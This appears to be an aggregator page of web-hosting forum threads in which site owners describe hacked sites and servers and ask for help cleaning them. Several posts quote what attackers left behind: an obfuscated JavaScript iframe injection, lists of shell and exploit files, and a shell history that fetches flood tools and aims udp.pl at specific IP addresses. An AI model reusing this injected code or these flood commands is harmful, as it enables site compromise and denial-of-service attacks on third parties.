Site Is Hacked
Mar 4, 2008I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:
[url]
ADVERTISEMENT
SITE WAS HACKED!
Jul 27, 2008A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
View 6 Replies View RelatedMy Site Has Been Hacked
Oct 1, 2007One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
Site Up And Down- Am I Being Hacked
Jun 22, 2009My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!
And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.
Quote:
<script type="text/javascript" src="swfobject.js"></script>
<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>
What the heck is going on?
Best Way To Clean A Hacked Site?
Nov 9, 2009What is the best way to clean a hacked site?
All of the pages have iframe injection and my only backup was made after the attack.
I have hundreds of pages, do I have to edit them all manually?
Unknown Script/hacked Site
Mar 10, 2008For a bit now, my site has been having probems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.
The script looks like this: ....
Youtube Clone Site Been Hacked
Nov 18, 2007The database has been changed. Some of the data has been altered
The tilte has been change to: Hacked By Genc_Rapci
Shell Uploaded - Site Hacked - How To Trace ?
Nov 6, 2008Shell uploaded - Site hacked - How to trace?
Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....
Site Hacked Via Php Script Placed In WordPress Uploads Directory
Apr 7, 2007First of all, I discoverd this forum during my quest to unravel the mysteries of how my site was hacked. I hope this is an appropriate forum to discuss the issues even though I am not a web hosting provider, but merely a customer of a web hosting company, hostrocket.com
I have an installation of WordPress 2.1 WordPress creates a couple world writable directories such as Uploads and Cache which are owned by nobody. Apparently (according to the tech support at hostrocket.com) someone was able to insert and exectue a php script in my world writable Uploads directory. Over 40MB of scripts, executables and files were uploaded. As best I can tell, my space was being used as some sort of link farm or perhaps acting as a server in my webspace. I do not have much knowledge about these things and consequently can't talk very inetlligently about them. But I am trying to grasp what little I am able to absorb about how this could have happened, what I can do to mitigate it from reocurring in the future.
Some of the stuff that was in the directory is as follows...
2421
bindz
h4ckerz
mass.pl p
trace-kmod
2421.1
brk
help.php
mybindshell
ptrace24
99.php
coredump
idf.php
netcat
pwned
CMD.php
dc.pl
index.html
online
r0nin
TMT.htm
elfdump
kmod2
online.tar.gz
raptor
TTdummyfile
gcc
krad3
prctl2
uselib24
bind.pl g
cc.1
list.txt
ptrace
The "online" directory contained over 40MB of directories such as...
abortion diethylpropion
accounting diflucan
accupril diovan
acne distance-education
actonel dospan
actos dovonex
acyclovir doxycycline
adderall drug
adipex drug-rehab
adventure-travel drug-test
adware dvd
adware-spyware e-pathto
affiliate-program effexor
air-travel elavil
aldara enalapril
alprazolam equity-loan
altace estradiol
amaryl evista
ambien fioricet
amitriptyline flexeril
amoxicillin flonase
amoxil florida-lottery
antivirus fluoxetine
atenolol fosamax
ativan free-poker
avandia free-slots
avapro free-spyware
baclofen furniture
bankruptcy gambling
bextra home-equity-loan
biaxin home-loan
bingo hosting
black-jack hotel
blackjack hydrocodone
blackjack-game images
bontril imitrex
britney-spears insurance-life
business internet-betting
buspar internet-gambling
buspirone loan
butalbital loans
buy-hardware lortab
buy-phentermine lottery
california-lottery lotto
captopril mesothelioma
car mortgages
car-insurance online-black-jack
carisoprodol online-casino
cars online-gambling
cartia online-loan
cash-loan online-pharmacy
casino online-poker
casino-games online-roulette
casino-las-vegas online-slot
celebrex payday-advances
celebrex-online phentermine
celexa poker
celexa-online poker-chips
cephalexin poker-game
cialis poker-tables
cigarette refinance
cigarettes refinance-house
cipro refinance-loan
claritin refinancing
clindamycin ringtones
clonazepam roulette
clonidine slot-machine
codeine slot-machines
consolidate-card slots
cozaar steroids
credit structured-settlement
credit-card texas-holdem
credit-card-debt texas-holdem-poker
credit-card-debt-consolidation texas-holdem-rules
creditcard texas-lottery
cyclobenzaprine tramadol
darvocet travel
dating travel-insurance
debt-consolidation ultram
debtcard valium
denavir viagra
diazepam vicodin
diclofenac video-poker
didrex wagering
diet-pills xanax
As you can see, I was had in a BIG way.
So the first thing my webhost had me do was to change ownership of the directories owned by nobody to me. Then I was able to change permissions from 777 to 755. However in so doing, I am no longer able to use the Dashboard of WordPress to upload images anymore, unless I temporarily change permissions back to 777.
The other thing the tech support guy did is to create an .htaccess file with,
php_flag engine off
I guess this basically renders php scripts impotent from running.
So without flaming me, can you help me understand how someone in a shared server environment is able to put a php script into one of my directories?
What amazed me was this particular script, "99.php" actually when viewed in a browser window titled phpshell was called "c99adult v. 1.0 pre-release build #16". It basically enabled whoever had access to the URL, to view my webspace, and do all sorts of nasty things. Talk about a wake-up call!
Obviously this enabled the hacker to view my config.php file and ascertain my database password and everything else. Whether he did, or whether there is a logfile of that info that could enable him to hack the database at some time in the future is unknown to me but it's really freaking me out.
Static Routes With Linux & Shorewall (site To Site VPN Virtual Private Network)
Mar 29, 2009Attached is a (badly) drawn diagram of two sites, connected by a vpn.
The site to the left, is network 10.0.0.0/24 which runs a linux server as the router for the network.
The site to the right, is network 10.1.0.0/24 which runs a windows 2003 server as the router for the network.
Now, my problem is, the clients behind the windows 2003 server can ping any machine on the first network because i setup a static route to route all traffic to 10.0.0.0/24 over the vpn interface.
now, my problem is, only the linux server can ping any machine on the windows 2003 network, any client behind the linux server cant seem to route over the interface.
I have the following route on the linux server: .....
Plesk Automation :: Adding Dedicated IP Breaks Site (visitors Land On Default Site)
Apr 14, 2015Starting point: a working site using a shared IPv4, dedicated IPv6, and SSL. HTTP and HTTPS work, the latter only using SNI of course.
The good news: If I simply allocate an IP resource of 1 to a subscription it is pulled from the pool, assigned to the service node, assigned to the web site, DNS is updated, and the site is automatically changed to using a Dedicated IPv4 and Dedicated IPv6.
The bad news: visitors land on the default web site of the service node, with the default SSL certificate.
Other info: I can't ping the new IP, even though it shows in "ip a l" and /etc/sysconfig/network-scripts/ifcfg-eth0:0. [edited]
After the IP assignment, it is still installed, and /etc/httpd/conf/plesk.conf.d/ip_default/domainname.conf shows the new certificate is being used.
However, a second set of VirtualHost entries is created in server.conf for this IP for ports 80 and 443, with NameVirtualHost enabled on the new IP. The port 443 entry uses the default certificate. Apache's setup this default VirtualHost entry will override the web site configuration because Apache is listening on port 443 with the wrong cert.
If I go to "Change webspace settings" and toggle to Shared IPv4, Dedicated IPv6 the site works again via HTTPS, and Dedicated IPv4 and Dedicated IPv6 breaks it again. Setting the SSL cert to None and back again does not work.
Setting the SSL cert to None, changing to a dedicated IP, and enabling SSL results in the server being inexplicably inaccessible...browsers no longer connect to either the default site or the correct site, and I don't see any entries in the vhosts's logs.
Is There Anyone Knows For A Good Hosting,which Is Allowed : Adult Site & Casino Site?
May 21, 2008is there anyone knows for a good hosting located in uk,which is allowed : adult site and casino betting online site ?
im looking for vps and dedicated server.
please help me i really need as soon as possible.thx
How Effective Can Be Lighttpd 4 My Site ( Forum + Filesharing Site )
Jun 16, 2008I run basicly run two main site.
1.Forum big one .
2.File and image sharing site.
(image sharing site generates thumbnails which produces lots of hits)
In these conditions how much difference can lighttpd can do as compared to apache for keeping my 600 MB Ram VPS host constant.
Hacked VPS
Apr 3, 2008I am renting a 384mb Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks including dictionary attacks. My host has cleaned up the mess. I suspect access was gained thru a weak password choice or thru a Wordpress hack.
The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?
Hacked Or Not
Aug 5, 20092 days ago i noticed my cpanel hardisk usage was a lot more then it should be, after looking around i found out my inbox was 400mb (82143)emails!! i don't use any of the cpanel email because i have them set to forwarding. all the emails are spam and i discovered a few emails using my domain (that i did not create) that are valid and when i email them it reaches this cpanel inbox
So how bad is it? have i been completely comprised or is someone managed to get some type of spaming access only?
Been Hacked
Feb 5, 2008I have a server with about 100 domains on it in Plesk. I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.
About a week ago we received a "too many connections" error when accessing Plesk. This is our server and it sits at The Planet (formerly EV1). I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff. (I'm more of a php / html kind of guy).
I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server. It's clearly spam of some kind. I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.
I Got Hacked
Feb 4, 2007Well, this is rather weird. I cant tell if this is a server error, or a hack.
Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them.
Hacked
Jul 23, 2007My cpanel server has an intruder who brought all the sites down. I did my best to harden the server a year or so ago, but...
I got an email from one of my scripts:
SUBJECT: [hackcheck] kill has a uid 0 account
IMPORTANT: Do not ignore this email.
This message is to inform you that the account kill has user id 0 (root privs).
This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.
To say the least, the server was compromised. I cannot find the user "0" or "kill" in WHM, but under "Wheel Group Users" "kill" is listed under "Add a user to the wheel group."
Any help or insight would be appreciated! Anyone proficient at hardening servers and exorcising hackers?
I uploaded the latest chkrootkit and ran it. The results say it's clean.
Am I Hacked And Anything I Can Do
Feb 13, 2007Am I hacked by somebody?
Any thing I can do to stop this (for example by hiring server management company)???
Here's the info that RKHunter provided:
/sbin/modinfo [ NA ]
/sbin/insmod [ NA ]
/sbin/depmod [ NA
Rootkit 'RH-Sharpe's rootkit'... [ Warning! ]
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------
Checking users with UID '0' (root)... [ Warning! (some users in root group) ]
info: adm:0
And here's the info I've found after investigation:
-bash-2.05b# pwd
/usr/local/games
-bash-2.05b# ls -lah
total 332K
drwxr-xr-x 3 root root 4.0K Feb 5 15:59 .
drwxr-xr-x 15 root root 4.0K Feb 12 19:32 ..
drwxr-xr-x 3 1555 1555 4.0K Feb 2 12:58 .fl
-rwxr-xr-x 1 root root 263K Feb 2 12:51 ettercap
-rwxr-xr-x 1 root root 17K Feb 2 12:51 parse
-rw-r--r-- 1 root root 119 Feb 2 12:51 pid
-rw-r--r-- 1 root root 27K Feb 3 17:44 x
-bash-2.05b#
Am I Hacked
May 22, 2007i daily check my error log files to see if something was wrong , checkout what i found
the first one is probably trying to hack my site to get to my ads and changing it to them i think
[error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
[error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
[error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpadsnew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpads
[error] [client 195.23.16.24] File does not exist: /var/www/html/Ads
[error] [client 195.23.16.24] File does not exist: /var/www/html/ads
this 1 I dont know
[error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
[error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/_vti_bin
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
This 1 is kinda keep me scared i dont know what it is either
[Mon May 21 16:11:00 2007] [error] [client 129.29.227.4] Invalid URI in request T 5.1; U; en)
[Tue May 22 15:59:09 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179781859
[Tue May 22 16:09:15 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:20 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:29 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179868171
[Tue May 22 16:30:23 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179869368
[Tue May 22 16:30:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:30:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
Hacked
Sep 10, 2007my server hacked
24 cat /proc/cpuinfo
25 ls
26 cd /var/tmp
27 ps x
28 ls
29 mkdir .www
30 cat /proc/cpuinfo
31 cat /etc/issue
32 mkdir .ww
33 cd .ww
36 download alexscan.tar.gz
37 tar xvfz alexscan.tar.gz
38 tar xvf alexscan.tar.gz
39 cd Vek
40 ls
41 ./Vek 210
42 ls
43 cd ..
44 ./ss
45 ls
46 cd ..
47 cd .ww
48 download joker.tgz
49 tar xvfz joker.tgz
50 download flood-udp.tar
52 tar xvfz flood-udp.tar
53 tar xvf flood-udp.tar
54 perl udp.pl 72.8.131.39 0 0
55 perl udp.pl 89.42.72.6 0 0
56 perl udp.pl 83.42.64.149 0 0
57 passwd
58 ls
59 cd joker
60 ls
61 chmod +x *
62 ./x 23.12
Hacked? Or Not
May 9, 2007I have a new server and I have hardened it with csf+lfd. It's about 65/70 in the cfs score.
This morning, I noted that lfd log sent me an email saying there is a SSH login via 207.210.233.128 on 10th May 2007. I am not sure whether it was a successful login or not?
Here is the output:
=================
Time: Thu May 10 01:31:52 2007IP: 207.210.233.128 (Unknown)Account: rootMethod: password authentication
========================
I know for sure that I did not login my SSH yesterday.
However, when I logged in SSH this morning, it says in telnet that my last login was from my own home computer's IP, so from that it looks like no one else has logged in SSH since last time I logged in myself.
Was my server intruded or was lfd just playing up?
I've Been Hacked
May 11, 2007Go to this page:
[url]
how I can find out what page they have changed? It is a php file with loads of includes etc. Not sure where to look! Or could it be a redirect or something?
VPS Getting Hacked
Apr 12, 2007I have a VPS running cpanel/whm on CentOS.
Everyday someone keeps coming in and deleting all my accounts. I do have them saved, but I cannot figure out how they are doing it.
I have followed the tips on the forum for locking down VPS. We have restriced SSH logins to our IP, we have checked all directories for ones that are 777 and changed them, we have moved the server to a different IP address.
Database Site Vs Comany Site
Jun 29, 2009I'm on a short assignment to inventory and manage the fixed assets of a small company, and we've just bought a web-based database for this purpose. While I'm pretty good at administering/running local databases, the web part has me stymied. Our company is between IT people, and there's no one on site with any more idea than I have about what's going on!!
Here's what I have so far:
--The company has a website which I'll call "ourwebsite.org" -- which I think, from searching the IP address the website points to, is hosted by HostMySite.com.
--There's also a record in DNS Management with the same name (ourwebsite.org), but pointing to our little server's local IP address.
--I need to find a way to get my database -- which I can access on the network at (server's IP address)/database (ie 0.0.00.0/database) -- online. I tried creating records in DNS Management (for ex., assets.ourwebsite.org) that point to our server's IP (the one that, if I type it in on the network, I can get to the site I'm looking for), but get generic "can't find the page" or "can't connect to the server" errors, even after 72 hours, when trying to access it from off the network.
--If I browse to assets.ourwebsite.org/database on the server itself, I get to the website! But if I go to that page from any other computer, on or off the network, it doesn't work.
--The Server is running Windows Server 2003
So, what are my options? Do I have to talk to the HostMySite.com people to add this page? Shouldn't I just be able to use my server's name (ourcompanyadc.ourcompany.org) and have that route to the server? What's going on here! Is there a simple way to get a tiny local-server-hosted website online outside of the network?
Site Shows Another's Site After Transfer
Jan 9, 2008I just transferred a domain from one cpanel box to another.
Now, that site is showing someone else's page. I've seen this happen before, but I cannot remember the fix.
the virtual host in httpd.conf is fine, shows proper IP, username, docroot, etc
Dns zone is fine as well.
The domain is using the server's main IP, so that's not the cause.
Centos 5 / cpanel 11 / apache 1.3 / php 4x
Website Hacked
Jul 27, 2007So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message! However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./
When I removed the period, the site appeared as normal. I don't know anything about the server other than it's IIS. Is there anything I can suggest to them when I go in to interview? I'd like to point this out to them; it may even help my chances at landing the job! (It's not related to networking, though.)
WHMCS Hacked
Nov 23, 2008Now, first of all... I'm not sure if this is a problem with WHMCS or some other piece of software with a security hole, but I thought I should post here.
Our WHMCS got hacked earlier today and the hacker sent out a to be honest, unacceptable email to all clients, I won't go into detail but lets just say it directly insulted them.
Now apart from ruining our reputation and client relationships, I am now completely paranoid that it will happen again. I'd also like to know how it happened in the first place. The hacker signed up for a hosting account, and then sent the email. I have no idea how he/she did it, but when I look at the admin log in WHMCS, it shows the username "hacked" as logging in (see image).http://img378.imageshack.us/img378/2560/hackedmh9.png
Just a warning to everyone out there. His IP address was 86.132.228.82.
We Were Hacked, Where Do We Start.
Jan 27, 2009we have a vps server and someone did what I would call a calling card attack, thankfully.
It is a stock kubuntu os with stock apache. Root passwords for everything have been changed to our own
Somehow they logged into kubuntu as root and changed the htpasswd in usr/passwords (changed to protect the password).
Then since they changed the htpasswd they were able to log into phpmyadmin and changed the admin password in the database.
I'm pretty sure I know who did it and he is teaching us a lesson which I respect but he will not comunicate with us.
We have hourly snapshots of our vps and we need to know how they are getting in. See my sig and click on the hotspot login.
Looking at the sudoers there is the Defaults line that we suspect as a means to get in.
We have a great php etc... app but it is either Apache or kubuntu that they can get in.
I would like to learn about what needs to be done about security but where do I start?
Can someone help me look for something that would allow the attack?
I'm a php guy and it is not a mysql injection attack nor is it an xss attack.
I am not a kubuntu / server security guy and now need your advice.
Web Hosts Being Hacked Using PHP?
May 22, 2008Out of the three websites that were hacked the hacker left a get.php file in the root and i decided to see what it was and i ran it. To my shock and horror it gave me all the different types of people hosted on the server and it also gave me their database passwords etc...
Now each time i ran it, it gave me different results of different users on the server each time with a long never ending list. I just couldnt believe my eyes a simple short written php script showed me a lot.
Now im not a PHP guru but this is quite serious and ive notified my web host showing them my findings. I was quite astonished it showed me passwords in peoples configs.
Now my question is... is this something new or old and that my web hosts forgot to look into that area...? I mean its a php script thats all.
My Server Seems Be Hacked
Mar 17, 2007SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini
- How I can check he has made any backdoor for himself or not?
and I have made a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.
- How I can remove them?
